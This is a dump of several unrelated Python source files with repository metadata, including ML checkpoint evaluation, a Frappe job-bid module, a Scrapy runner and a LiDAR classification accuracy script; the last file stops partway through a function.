    root = os.path.join('/mnt/storage/home/rn18510/', folder)
    shfiles = os.listdir(root)
    shfiles = [os.path.join(root, i) for i in shfiles if '.sh' in i]
    all_shfiles += shfiles
for shfile in all_shfiles:
    list_sh = mmcv.list_from_file(shfile)
    for line in list_sh:
        if 'WORK_DIR=' in line:
            workdir = line
        if 'CONFIG=' in line:
            config = line
    workdir = workdir.replace('WORK_DIR=', '')
    config = config.replace('CONFIG=', '')
    if os.path.exists(workdir):
        pass
    else:
        print('not exe')
        continue
    print(workdir)
    print(config)
    all_result_file = [i for i in os.listdir(workdir) if '.result' in i]
    all_pth_file = [i for i in os.listdir(workdir) if '.pth' in i and 'latest' not in i]
    to_exe_pth = []
    if len(all_result_file) > 11 and len(all_pth_file) > 11:
        # find the best-scoring epoch
        best = sorted(all_result_file, key=lambda x: int(x.split('.')[0].split('_')[-1]))[-1]
        latest = sorted(all_pth_file, key=lambda x: int(x.split('.')[0].split('_')[-1]))[-1]
        ep = int(best.split('.')[0].split('_')[0].replace('ep', ''))
        ep = 'epoch_{}.pth'.format(ep)
        if ep == latest:
            pass
        else:
            to_exe_pth.append(ep)
        to_exe_pth.append(latest)
    else:
        to_exe_pth += all_pth_file
    all_txt_file = [i for i in os.listdir(workdir) if '.txt' in i]
    txt_eps = [i.split('.')[0].split('_')[-1].replace('ep', '') for i in all_txt_file]
    to_exe_eps = [i.split('.')[0].split('_')[-1] for i in to_exe_pth]
    # filter out epochs that already have a .txt result file
    to_exe_eps = list(set(to_exe_eps) - set(txt_eps))
    to_exe_pth = ['epoch_{}.pth'.format(ep) for ep in to_exe_eps]
    for exe_pth in to_exe_pth:
        print('running', config, workdir, exe_pth)
        subprocess.run(['sh', 'tools/dist_test.sh', '{}'.format(config), '{}'.format(os.path.join(workdir, exe_pth)), '2', '--work_dir', '{}'.format(workdir)])
| 31.820513 | 148 | 0.695407 | 416 | 2,482 | 3.975962 | 0.269231 | 0.033253 | 0.033857 | 0.016929 | 0.109432 | 0.109432 | 0.090085 | 0.090085 | 0.090085 | 0.037485 | 0 | 0.013264 | 0.149476 | 2,482 | 77 | 149 | 32.233766 | 0.770251 | 0.056406 | 0 | 0.080645 | 0 | 0 | 0.087479 | 0.022298 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.032258 | 0.241935 | 0 | 0.241935 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3923d604ff92a346c270b87926a44f2862185eb0 | 3,118 | py | Python | community_erpnext_com/erpnext_community_portal/doctype/frappe_job_bid/frappe_job_bid.py | saurabh6790/community_erpnext_com | edf285de15285e376b223b8c85ea19b46e7d16d7 | [
"MIT"
] | null | null | null | community_erpnext_com/erpnext_community_portal/doctype/frappe_job_bid/frappe_job_bid.py | saurabh6790/community_erpnext_com | edf285de15285e376b223b8c85ea19b46e7d16d7 | [
"MIT"
] | null | null | null | community_erpnext_com/erpnext_community_portal/doctype/frappe_job_bid/frappe_job_bid.py | saurabh6790/community_erpnext_com | edf285de15285e376b223b8c85ea19b46e7d16d7 | [
"MIT"
] | 1 | 2020-02-27T11:18:08.000Z | 2020-02-27T11:18:08.000Z | # Copyright (c) 2015, Frappe Technologies Pvt Ltd and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.website.website_generator import WebsiteGenerator
from frappe.website.utils import get_comment_list
class FrappeJobBid(WebsiteGenerator):
    website = frappe._dict(
        template = "templates/generators/bid.html",
        page_title = "Bid",
        no_cache = 1,
    )

    def onload(self):
        self.frappe_job_title = frappe.db.get_value("Frappe Job", self.frappe_job, "job_title")

    def before_insert(self):
        if frappe.db.get_value("Frappe Job Bid",
            {"frappe_partner": self.frappe_partner, "frappe_job": self.frappe_job}):
            frappe.msgprint("You have already bid for this job")
            raise frappe.ValidationError
        if frappe.db.get_value("Frappe Job", self.frappe_job, "owner") == frappe.session.user:
            frappe.msgprint("You can't bid for your own job!")
            raise frappe.ValidationError
        self.frappe_job_title = frappe.db.get_value("Frappe Job", self.frappe_job,
            "job_title")
        self.frappe_partner_title = frappe.db.get_value("Frappe Partner", self.frappe_partner,
            "partner_name")

    def after_insert(self):
        frappe.sendmail(
            recipients=[frappe.db.get_value("Frappe Job", self.frappe_job, "owner")],
            subject="New Bid for your Job {0}".format(self.frappe_job_title),
            message=new_bid_template.format(**self.as_dict()))

    def get_context(self, context):
        context.job = frappe.get_doc("Frappe Job", self.frappe_job)
        context.partner = frappe.get_doc("Frappe Partner", self.frappe_partner)
        context.comment_list = get_comment_list(self.doctype, self.name)

    def get_parents(self, context):
        return [{"title": "Community", "name": "community"},
                {"title": "Jobs", "name": "community/jobs"},
                {"title": context.job.job_title, "name": context.job.route}]

    def on_trash(self):
        if self.status == "Accepted":
            frappe.throw(_("Accepted bid cannot be deleted"))

@frappe.whitelist()
def accept(bid):
    bid = frappe.get_doc("Frappe Job Bid", bid)
    job = frappe.get_doc("Frappe Job", bid.frappe_job)
    if job.owner != frappe.session.user:
        frappe.throw(_("Not Allowed"), frappe.PermissionError)
    if job.status != "Open":
        frappe.throw(_("Bid not Open"))
    bid.status = "Accepted"
    bid.save(ignore_permissions=True)
    bid.clear_cache()
    job.status = "Assigned"
    job.frappe_partner = bid.frappe_partner
    job.save(ignore_permissions=True)
    job.clear_cache()

@frappe.whitelist()
def delete(bid):
    bid = frappe.get_doc("Frappe Job Bid", bid)
    if bid.owner != frappe.session.user:
        frappe.throw(_("Not Allowed"), frappe.PermissionError)
    frappe.delete_doc("Frappe Job Bid", bid.name, ignore_permissions=True)
    job = frappe.get_doc("Frappe Job", bid.frappe_job)
    job.clear_cache()
new_bid_template = """
<h3>Notification from Frappe.io Community Portal</h3>
<p>{frappe_partner_title} has bid for your job {frappe_job_title}</p>
<p><a href="https://community.erpnext.com/jobs/{frappe_job}">
Click here to manage bids</a></p>
"""
| 34.263736 | 89 | 0.739256 | 453 | 3,118 | 4.900662 | 0.262693 | 0.113514 | 0.064414 | 0.05045 | 0.359009 | 0.297297 | 0.262613 | 0.24955 | 0.24955 | 0.187387 | 0 | 0.002915 | 0.119949 | 3,118 | 90 | 90 | 34.644444 | 0.806122 | 0.03592 | 0 | 0.197183 | 0 | 0 | 0.244422 | 0.025308 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112676 | false | 0 | 0.070423 | 0.014085 | 0.225352 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39243003cba396e92b11cfacdc18745deb8b6050 | 2,314 | py | Python | Passing/rotate.py | FootBrawlers/Passing_Algo | 5341168dc12f7c4cb254a0a4901de7c3766cc823 | [
"MIT"
] | 1 | 2020-01-16T13:19:19.000Z | 2020-01-16T13:19:19.000Z | Passing/rotate.py | FootBrawlers/Passing_Algo | 5341168dc12f7c4cb254a0a4901de7c3766cc823 | [
"MIT"
] | null | null | null | Passing/rotate.py | FootBrawlers/Passing_Algo | 5341168dc12f7c4cb254a0a4901de7c3766cc823 | [
"MIT"
] | 1 | 2020-01-09T21:04:30.000Z | 2020-01-09T21:04:30.000Z | import math
if(__name__=="__main__"):
pos1=[-5,-2] #positions of the bots
pos2=[-9,2]
ang1=123 #initial direction of bots
ang2=21
def cosinv(num): #function to return cos inverse in degrees
ang=math.acos(num)
ang=180*ang/(math.pi)
return(ang)
def rotate(pos1,ang1,pos2,ang2): #actual function
dist=math.sqrt((pos1[0]-pos2[0])**2+(pos1[1]-pos2[1])**2) #distance between bots
x=abs(pos1[0]-pos2[0]) # adjacent side of triangle
c_ang=cosinv(x/dist) # cosx= adjacent/dist
# checking quadrant of bot 2 wrt bot1
if pos2[0]>pos1[0] and pos2[1]>=pos1[1]: #quad1
f_ang1=c_ang
elif pos2[0]<=pos1[0] and pos2[1]>pos1[1]: #quad2
f_ang1=180-c_ang
elif pos2[0]<pos1[0] and pos2[1]<=pos1[1]: #quad3
f_ang1=180+c_ang
elif pos2[0]>=pos1[0] and pos2[1]<pos1[1]: #quad4
f_ang1=360-c_ang
# bot 2 final position should be facing bot1....
if f_ang1<180:
f_ang2=180+f_ang1
elif f_ang1>=180:
f_ang2=f_ang1-180
print("INITIAL POSITIONS: ",pos1,ang1,pos2,ang2)
print("THEIR FINAL DIRECTIONS: ",f_ang1,f_ang2)
return f_ang1,f_ang2
#f_ang1,f_ang2=rotate(pos1,ang1,pos2,ang2)
#clockwise-> +ve , anticlockvise-> -ve
def change_in_angle(ang1,fang1,ang2,fang2): #To get the angle bot needs to rotate
c1=abs(fang1-ang1) #one possible angle
c2=abs(360-c1) #other possible angle
c=min(c1,c2) #for min rotation.
fin=ang1+c
if fin>360:
fin-=360 #to prevent angle exceeding 360
if int(fin)==int(fang1):
c_final=c*-1 #anticlockwise turn
else:
c_final=c #clockwise turn
#same process for bot 2 as well.
d1=abs(fang2-ang2)
d2=abs(360-d1)
d=min(d1,d2)
fin2=ang2+d
if fin2>360:
fin2-=360
if int(fin2)==int(fang2):
d_final=d*-1
else:
d_final=d
print("change for passer is",c_final)
print("change for receiver is",d_final)
return c_final,d_final
#change_in_angle(ang1,f_ang1,ang2,f_ang2)
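
# Worked example (illustrative, using the sample positions defined above):
# for pos1=[-5,-2] and pos2=[-9,2], dx=4 and dy=4, so dist=sqrt(32)~5.657 and
# c_ang=cosinv(4/5.657)=45 degrees. Bot 2 lies in quadrant 2 relative to bot 1,
# giving f_ang1=180-45=135; since 135<180 the receiver faces back with
# f_ang2=180+135=315.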
| 27.879518 | 87 | 0.553587 | 350 | 2,314 | 3.537143 | 0.3 | 0.048465 | 0.03231 | 0.03231 | 0.163166 | 0.106624 | 0.106624 | 0.106624 | 0.106624 | 0.088045 | 0 | 0.110473 | 0.32325 | 2,314 | 83 | 88 | 27.879518 | 0.680077 | 0.250216 | 0 | 0.037736 | 0 | 0 | 0.057196 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056604 | false | 0.018868 | 0.018868 | 0 | 0.113208 | 0.075472 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3924b0c63a982cfc2185670003e734bf53265e66 | 1,346 | py | Python | aggregate/quality_of_life/access_to_jobs.py | NYCPlanning/db-equitable-development-tool | b24d83dc4092489995cabcdcb611642c1c8ee3b2 | [
"MIT"
] | 1 | 2021-12-30T21:03:56.000Z | 2021-12-30T21:03:56.000Z | aggregate/quality_of_life/access_to_jobs.py | NYCPlanning/db-equitable-development-tool | b24d83dc4092489995cabcdcb611642c1c8ee3b2 | [
"MIT"
] | 209 | 2021-10-20T19:03:04.000Z | 2022-03-31T21:02:37.000Z | aggregate/quality_of_life/access_to_jobs.py | NYCPlanning/db-equitable-development-tool | b24d83dc4092489995cabcdcb611642c1c8ee3b2 | [
"MIT"
] | null | null | null | import pandas as pd
from internal_review.set_internal_review_file import set_internal_review_files
from utils.PUMA_helpers import clean_PUMAs, puma_to_borough

def access_to_jobs(geography, write_to_internal_review=False):
    indicator_col_name = "access_employment_count"
    clean_df = load_clean_source_data(indicator_col_name)
    final = clean_df.groupby(geography).sum()[[indicator_col_name]]
    if write_to_internal_review:
        set_internal_review_files(
            [(final, "access_employment.csv", geography)],
            "quality_of_life",
        )
    return final

def load_clean_source_data(indicator_col_name) -> pd.DataFrame:
    source_data = pd.read_csv(
        "resources/quality_of_life/access_to_jobs.csv",
        usecols=[
            "PUMA",
            "Weighted Average Number of Jobs Accessible within 30 mins from Tract Centroid by Transit",
        ],
    )
    col_name_mapper = {
        "PUMA": "puma",
        "Weighted Average Number of Jobs Accessible within 30 mins from Tract Centroid by Transit": indicator_col_name,
    }
    source_data.rename(columns=col_name_mapper, inplace=True)
    source_data["puma"] = source_data["puma"].apply(func=clean_PUMAs)
    source_data["borough"] = source_data.apply(axis=1, func=puma_to_borough)
    source_data["citywide"] = "citywide"
    return source_data
3925fe1fce8c87b4355c29e43b08be99a6eefa03 | 388 | py | Python | job_scraper/__init__.py | DannyMcwaves/ATS | 91327ce15b4c4ea2fffebf02562cb8095b7983ec | [
"BSD-3-Clause"
] | null | null | null | job_scraper/__init__.py | DannyMcwaves/ATS | 91327ce15b4c4ea2fffebf02562cb8095b7983ec | [
"BSD-3-Clause"
] | 4 | 2020-06-05T17:38:46.000Z | 2022-03-02T14:54:30.000Z | job_scraper/__init__.py | DannyMcwaves/ATS | 91327ce15b4c4ea2fffebf02562cb8095b7983ec | [
"BSD-3-Clause"
] | null | null | null | """
run the scrape bot from inside the project
using an exported function from this module.
"""
__all__ = ['run']
from scrapy.crawler import CrawlerProcess
from .spiders import JobScraperSpider
def run(url):
    process = CrawlerProcess({
        'USER_AGENT': 'AppleWebKit/537.36 (KHTML, like Gecko)'
    })
    process.crawl(JobScraperSpider, start_urls=[url])
    process.start()
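
# Illustrative usage (the URL is hypothetical). Note that CrawlerProcess.start()
# blocks until the crawl finishes and Scrapy's Twisted reactor cannot be
# restarted, so run() is meant to be called once per process:
#   run("https://example.com/jobs")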
| 20.421053 | 62 | 0.708763 | 47 | 388 | 5.723404 | 0.723404 | 0.074349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015773 | 0.18299 | 388 | 18 | 63 | 21.555556 | 0.832808 | 0.224227 | 0 | 0 | 0 | 0 | 0.174061 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
392acdb2ba71ec521fa09fbe78d6aeda095a2027 | 20,473 | py | Python | python_scripts/tools/test_accuracy.py | cristianwpuig/Object-detection-and-classification-using-LiDAR-and-edgeTPU | fa876ee8ccf40ecfacfd3a697c41a519a15a3ff1 | [
"MIT"
] | null | null | null | python_scripts/tools/test_accuracy.py | cristianwpuig/Object-detection-and-classification-using-LiDAR-and-edgeTPU | fa876ee8ccf40ecfacfd3a697c41a519a15a3ff1 | [
"MIT"
] | null | null | null | python_scripts/tools/test_accuracy.py | cristianwpuig/Object-detection-and-classification-using-LiDAR-and-edgeTPU | fa876ee8ccf40ecfacfd3a697c41a519a15a3ff1 | [
"MIT"
] | null | null | null | import ctypes
import csv
import os
import numpy as np
import tflite_runtime.interpreter as tflite
import time
import platform
import collections
import operator
'''
source /home/cristian/virtualenvs/coral/bin/activate
python test_accuracy.py
'''
# Configuration parameters
print_results = True
load_results = False
write_results = True
labeled_data_dir = "/home/cristian/Desktop/LabelPointCloud/datasets/ObjDet_generated_dataset/"
total_processed_frames = len(os.listdir(labeled_data_dir + "frames/"))
start_frame_ID = 2
voxels_files_dir = "../c_algorithm_outputs/detected_objects_in_voxels/"
object_detection_outputs = "../c_algorithm_outputs/object_detection_outputs.csv"
tflite_saved_file = "./tflite_model/model_edgetpu.tflite"
config_file_dir = "./config.txt"
results_file_dir = "./tools/results.txt"
voxel_size = 16
image_size = [400, 200] # W X H
bounding_box_margin = 0.75 # Bounding box margin not counted as inside the ROI in m
start_voxels_num = 1
# To save all the generated voxels in a directory (this data is used to optimize the DNN parameters)
save_generated_voxels = True
save_generated_voxels_dir = "./tools/generated_voxels/"
def main():
    performance_metrics = load_results_file(load_results, results_file_dir)
    roi_axes_limits = read_axes_limit_from_config(config_file_dir)
    writein_object_detection_outputs(frame_ID = start_frame_ID, is_first_frame=False)
    libc = ctypes.CDLL("../Debug/libTWS_V2.1_so_Simu_ubuntu.so")

    # Load network into Coral
    init_time = time.time()
    interpreter = make_interpreter(tflite_saved_file)
    interpreter.allocate_tensors()
    loadnw_time = time.time() - init_time
    if print_results == True:
        print("Load Network time: ", 1000*loadnw_time, " ms")
    deleteVoxelFiles()

    for frame_ID in range(start_frame_ID, total_processed_frames):
        predicted_classes = []
        # Run object detection & tracking algorithm
        out = libc.main()
        obj_det_box_Xc, obj_det_csv_vel, obj_det_csv_area = loadcsv(object_detection_outputs, roi_axes_limits)
        voxel_files_names = os.listdir(voxels_files_dir)
        if save_generated_voxels == True:
            save_generated_voxels_function(voxels_files_dir, save_generated_voxels_dir)
        if os.listdir(voxels_files_dir) != []:
            for voxels_file in voxel_files_names:
                Voxel = read_voxel_file(voxels_files_dir + voxels_file)
                predicted_classes_aux = make_inference(Voxel, interpreter)
                predicted_classes.append(predicted_classes_aux)
        else:
            if print_results == True:
                print("No objects")
        deleteVoxelFiles()

        # Calculate performance metrics to evaluate the model
        HWLXcYcZc, classes_in_scene = read_object_point_cloud(frame_ID, labeled_data_dir)
        real_classes = object_classes_inside_ROI(HWLXcYcZc, classes_in_scene, roi_axes_limits)
        performance_metrics["total_real_objects"] += len(real_classes)
        performance_metrics["total_predicted_objects"] += len(predicted_classes)
        performance_metrics["total_classified_objects"] += min(len(real_classes), len(predicted_classes))
        correct_predictions = calculate_correct_predictions(HWLXcYcZc, real_classes, obj_det_box_Xc, predicted_classes)
        performance_metrics["objects_classified_correctly"] += correct_predictions
        performance_metrics = calculate_performance_metrics(real_classes, predicted_classes, correct_predictions, performance_metrics)
        if print_results == True:
            # print("HWLXcYcZc: ", HWLXcYcZc)
            # print("obj_det_box_Xc: ", obj_det_box_Xc)
            print("real_classes: ", real_classes)
            print("predicted_classes: ", predicted_classes)
            print("correct_predictions: ", performance_metrics["objects_classified_correctly"])
            print("performance_metrics[total_real_objects]: ", performance_metrics["total_real_objects"])
            print("performance_metrics[total_predicted_objects]: ", performance_metrics["total_predicted_objects"])
            print("performance_metrics[total_classified_objects]: ", performance_metrics["total_classified_objects"])
            if (performance_metrics["total_classified_objects"] != 0):
                print("Accuracy: ", (performance_metrics["objects_classified_correctly"]/performance_metrics["total_classified_objects"])*100, "%")
            print("performance_metrics: ", performance_metrics)
        if (write_results == True):
            write_results_in_file(results_file_dir, performance_metrics)

def save_generated_voxels_function(voxels_files_dir, save_generated_voxels_dir):
    if not os.path.exists(save_generated_voxels_dir):
        os.makedirs(save_generated_voxels_dir)
    voxel_files_names = os.listdir(voxels_files_dir)
    num_voxels_previously_generated = len(os.listdir(save_generated_voxels_dir))
    count = 0
    for voxels_file in voxel_files_names:
        os.system("cp " + voxels_files_dir + voxels_file + " " + save_generated_voxels_dir + "voxel_object_" + str(start_voxels_num + num_voxels_previously_generated + count) + ".txt")
        count += 1

def write_results_in_file(results_file_dir, performance_metrics):
    row_cnt = 0
    object_detection_outputs_aux = "./tools/results_aux.txt"
    with open(results_file_dir, 'r') as f_in, open(object_detection_outputs_aux, 'w') as f_out:
        header = csv.reader(f_in)
        writer = csv.writer(f_out)
        for row in header:
            row_cnt += 1
            if (row_cnt == 1):
                row[0] = '// Results used to calculate the accuracy'
            if (row_cnt == 2):
                row[0] = 'TP = ' + str(int(performance_metrics["TP"]))
            if (row_cnt == 3):
                row[0] = 'TN = ' + str(int(performance_metrics["TN"]))
            if (row_cnt == 4):
                row[0] = 'FP = ' + str(int(performance_metrics["FP"]))
            if (row_cnt == 5):
                row[0] = 'FN = ' + str(int(performance_metrics["FN"]))
            if (row_cnt == 6):
                row[0] = 'total_real_objects = ' + str(int(performance_metrics["total_real_objects"]))
            if (row_cnt == 7):
                row[0] = 'total_predicted_objects = ' + str(int(performance_metrics["total_predicted_objects"]))
            if (row_cnt == 8):
                row[0] = 'total_classified_objects = ' + str(int(performance_metrics["total_classified_objects"]))
            if (row_cnt == 9):
                row[0] = 'objects_classified_correctly = ' + str(int(performance_metrics["objects_classified_correctly"]))
            writer.writerow(row)
    os.system("mv " + object_detection_outputs_aux + " " + results_file_dir)

def load_results_file(load_results, results_file_dir):
    performance_metrics = {
        "TP": 0,
        "TN": 0,
        "FP": 0,
        "FN": 0,
        "Sensitivity": 0,
        "Specificity": 0,
        "Precision": 0,
        "F1": 0,
        "total_real_objects": 0,
        "total_predicted_objects": 0,
        "total_classified_objects": 0,  # used to calculate accuracy; false negative and false positive results do not count toward the accuracy calculation
        "objects_classified_correctly": 0
    }
    if load_results == True:
        with open(results_file_dir, 'r') as csvFile:
            reader = csv.reader(csvFile)
            for row in reader:
                if (row != []):
                    if (row[0][0:2] == "TP"):
                        performance_metrics["TP"] = float(row[0].split(" ")[2])
                    if (row[0][0:2] == "TN"):
                        performance_metrics["TN"] = float(row[0].split(" ")[2])
                    if (row[0][0:2] == "FP"):
                        performance_metrics["FP"] = float(row[0].split(" ")[2])
                    if (row[0][0:2] == "FN"):
                        performance_metrics["FN"] = float(row[0].split(" ")[2])
                    if (row[0][0:18] == "total_real_objects"):
                        performance_metrics["total_real_objects"] = float(row[0].split(" ")[2])
                    if (row[0][0:23] == "total_predicted_objects"):
                        performance_metrics["total_predicted_objects"] = float(row[0].split(" ")[2])
                    if (row[0][0:24] == "total_classified_objects"):
                        performance_metrics["total_classified_objects"] = float(row[0].split(" ")[2])
                    if (row[0][0:28] == "objects_classified_correctly"):
                        performance_metrics["objects_classified_correctly"] = float(row[0].split(" ")[2])
            csvFile.close()
    return performance_metrics

def calculate_performance_metrics(real_classes, predicted_classes, correct_predictions, performance_metrics):
    # If there are no objects in the ROI and no predicted objects, TN is increased
    if (len(real_classes) == len(predicted_classes) and len(real_classes) == 0):
        performance_metrics["TN"] += 1
    # If there are objects in the ROI and/or predicted objects, TP, FN and/or FP are increased
    else:
        if (len(real_classes) == len(predicted_classes)):
            performance_metrics["TP"] += len(predicted_classes)
        if (len(real_classes) > len(predicted_classes)):
            performance_metrics["TP"] += len(predicted_classes)
            performance_metrics["FN"] += len(real_classes) - len(predicted_classes)
        if (len(real_classes) < len(predicted_classes)):
            performance_metrics["TP"] += len(real_classes)
            performance_metrics["FP"] += len(predicted_classes) - len(real_classes)
    if (performance_metrics["TP"] != 0 and performance_metrics["FN"] != 0):
        performance_metrics["Sensitivity"] = 100*performance_metrics["TP"] / (performance_metrics["TP"]+performance_metrics["FN"])
        performance_metrics["Specificity"] = 100*performance_metrics["TN"] / (performance_metrics["TN"]+performance_metrics["FN"])
        performance_metrics["Precision"] = 100*performance_metrics["TP"] / (performance_metrics["TP"]+performance_metrics["FP"])
        performance_metrics["F1"] = 2* ((performance_metrics["Precision"]*performance_metrics["Sensitivity"]) / (performance_metrics["Precision"]+performance_metrics["Sensitivity"]))
    return performance_metrics
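
# Illustrative numeric check of the formulas above (made-up counts, not real
# results): with TP=8, FN=2, TN=5 and FP=1 the code computes
#   Sensitivity = 100*8/(8+2) = 80.0
#   Specificity = 100*5/(5+2) ~ 71.4   (note this code divides by TN+FN)
#   Precision   = 100*8/(8+1) ~ 88.9
#   F1          = 2*(88.9*80.0)/(88.9+80.0) ~ 84.2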

# This function calculates the number of correct answers by comparing the real
# labels with the predicted ones. To ensure that the real and predicted labels
# belong to the same object, the real and predicted objects with the closest
# bounding-box X coordinates are taken to be the same object.
def calculate_correct_predictions(HWLXcYcZc, real_classes, obj_det_box_Xc, predicted_classes):
    correct_predictions = 0
    if (len(real_classes) >= len(predicted_classes)):
        ID_dist_min = np.zeros(len(predicted_classes), dtype=np.int8)
        for ID_pred_obj in range(len(predicted_classes)):
            distance_min = 1000
            for ID_real_obj in range(len(real_classes)):
                distance_between_objects = abs(HWLXcYcZc[ID_real_obj][3] - obj_det_box_Xc[ID_pred_obj])
                if distance_between_objects < distance_min:
                    distance_min = distance_between_objects
                    ID_dist_min[ID_pred_obj] = ID_real_obj
        if (len(predicted_classes) == 1):
            if predicted_classes[0] == real_classes[ID_dist_min[0]]:
                correct_predictions += 1
        else:
            for i in range(len(predicted_classes)):
                if predicted_classes[i] == real_classes[ID_dist_min[i]]:
                    correct_predictions += 1
    if (len(predicted_classes) > len(real_classes)):
        ID_dist_min = np.zeros(len(real_classes), dtype=np.int8)
        for ID_real_obj in range(len(real_classes)):
            distance_min = 1000
            for ID_pred_obj in range(len(predicted_classes)):
                distance_between_objects = abs(HWLXcYcZc[ID_real_obj][3] - obj_det_box_Xc[ID_pred_obj])
                if distance_between_objects < distance_min:
                    distance_min = distance_between_objects
                    ID_dist_min[ID_real_obj] = ID_pred_obj
        if (len(real_classes) == 1):
            if real_classes[0] == predicted_classes[ID_dist_min[0]]:
                correct_predictions += 1
        else:
            for i in range(len(real_classes)):
                if (len(ID_dist_min) > 0):
                    if real_classes[i] == predicted_classes[ID_dist_min[i]]:
                        correct_predictions += 1
    return correct_predictions

def object_classes_inside_ROI(HWLXcYcZc, classes, roi_axes_limits):
    classes_inside_ROI = []
    for object_ID in range(len(HWLXcYcZc)):
        # If the limit of the bounding box (with a margin) is inside the ROI, it is counted as an object
        if HWLXcYcZc[object_ID, 3] >= (roi_axes_limits[0][0] - HWLXcYcZc[object_ID, 0]/2 + bounding_box_margin) and HWLXcYcZc[object_ID, 3] <= (roi_axes_limits[0][1] + HWLXcYcZc[object_ID, 0]/2 - bounding_box_margin):
            if HWLXcYcZc[object_ID, 4] >= (roi_axes_limits[1][0] - HWLXcYcZc[object_ID, 1]/2 + bounding_box_margin) and HWLXcYcZc[object_ID, 4] <= (roi_axes_limits[1][1] + HWLXcYcZc[object_ID, 1]/2 - bounding_box_margin):
                if HWLXcYcZc[object_ID, 5] >= roi_axes_limits[2][0] and HWLXcYcZc[object_ID, 5] <= roi_axes_limits[2][1]:
                    classes_inside_ROI.append(classes[object_ID])
    return classes_inside_ROI

def read_object_point_cloud(frame_ID, labeled_data_dir):
    csv_dir = labeled_data_dir + "labels/label_" + str(frame_ID) + ".txt"
    num_points = 0
    for row in open(csv_dir):
        num_points += 1
    HWLXcYcZc = np.zeros((num_points, 6))
    classes = []
    cnt_csv = 0
    with open(csv_dir, 'r') as csvFile:
        reader = csv.reader(csvFile, delimiter=' ')
        for row in reader:
            HWLXcYcZc[cnt_csv, 0] = row[8]
            HWLXcYcZc[cnt_csv, 1] = row[9]
            HWLXcYcZc[cnt_csv, 2] = row[10]
            HWLXcYcZc[cnt_csv, 3] = row[11]
            HWLXcYcZc[cnt_csv, 4] = row[12]
            HWLXcYcZc[cnt_csv, 5] = row[13]
            classes.append(row[0])
            cnt_csv += 1
        csvFile.close()
    return HWLXcYcZc, classes

def read_lidar_frame_point_cloud(frame_ID, labeled_data_dir):
    csv_dir = labeled_data_dir + "frames/frame_" + str(frame_ID) + ".csv"
    num_points = 0
    for row in open(csv_dir):
        num_points += 1
    XYZL = np.zeros((num_points, 4))
    cnt_csv = 0
    with open(csv_dir, 'r') as csvFile:
        reader = csv.reader(csvFile)
        for row in reader:
            XYZL[cnt_csv, 0] = row[0]
            XYZL[cnt_csv, 1] = row[1]
            XYZL[cnt_csv, 2] = row[2]
            XYZL[cnt_csv, 3] = row[3]
            cnt_csv += 1
        csvFile.close()
    return XYZL

def read_axes_limit_from_config(config_file_dir):
    roi_axes_limits = [[0, 0], [0, 0], [0, 0]]
    with open(config_file_dir, 'r') as csvFile:
        reader = csv.reader(csvFile)
        for row in reader:
            if (row != []):
                if (row[0][0:4] == "XMIN"):
                    roi_axes_limits[0][0] = float(row[0].split(" ")[2])
                if (row[0][0:4] == "XMAX"):
                    roi_axes_limits[0][1] = float(row[0].split(" ")[2])
                if (row[0][0:4] == "YMIN"):
                    roi_axes_limits[1][0] = float(row[0].split(" ")[2])
                if (row[0][0:4] == "YMAX"):
                    roi_axes_limits[1][1] = float(row[0].split(" ")[2])
                if (row[0][0:4] == "ZMIN"):
                    roi_axes_limits[2][0] = float(row[0].split(" ")[2])
                if (row[0][0:4] == "ZMAX"):
                    roi_axes_limits[2][1] = float(row[0].split(" ")[2])
        csvFile.close()
    return roi_axes_limits

def make_inference(Voxel, interpreter):
    top_k = 1
    threshold = 0.0
    init_time = time.time()
    set_input(interpreter, Voxel)
    interpreter.invoke()
    output = get_output(interpreter, top_k, threshold)
    inf_time = time.time() - init_time
    predicted_class = output[0][0]
    predicted_score = output[0][1]
    if print_results == True:
        print("Inference time: ", 1000*inf_time, " ms")
    return labels[predicted_class]

def deleteVoxelFiles():
    for f in os.listdir(voxels_files_dir):
        os.remove(os.path.join(voxels_files_dir, f))

def read_voxel_file(voxels_file):
    row_cnt = 1
    Voxel = []
    with open(voxels_file, 'r') as file:
        header = csv.reader(file, delimiter=',')
        for row in header:
            if (row_cnt % (voxel_size + 1) != 0) and row[0] != 'EOD':
                for col in range(voxel_size):
                    Voxel.append(float(row[col]))
            row_cnt += 1
    Voxel = np.array(Voxel)
    Voxel = Voxel*255.0
    Voxel = Voxel.astype(np.uint8)
    Voxel = Voxel.reshape(16, 16, 16)
    return Voxel
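
# Note on the voxel file layout assumed by read_voxel_file (inferred from the
# parsing above, not from separate documentation): each object is stored as 16
# slices of 16 comma-separated rows, with a delimiter row after every 16 data
# rows (hence the "row_cnt % (voxel_size + 1)" test) and an 'EOD' marker at the
# end. The 16*16*16 = 4096 values in [0, 1] are rescaled to uint8 to match the
# quantized edge TPU model input.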

def writein_object_detection_outputs(frame_ID=40, is_first_frame=False):
    row_cnt = 0
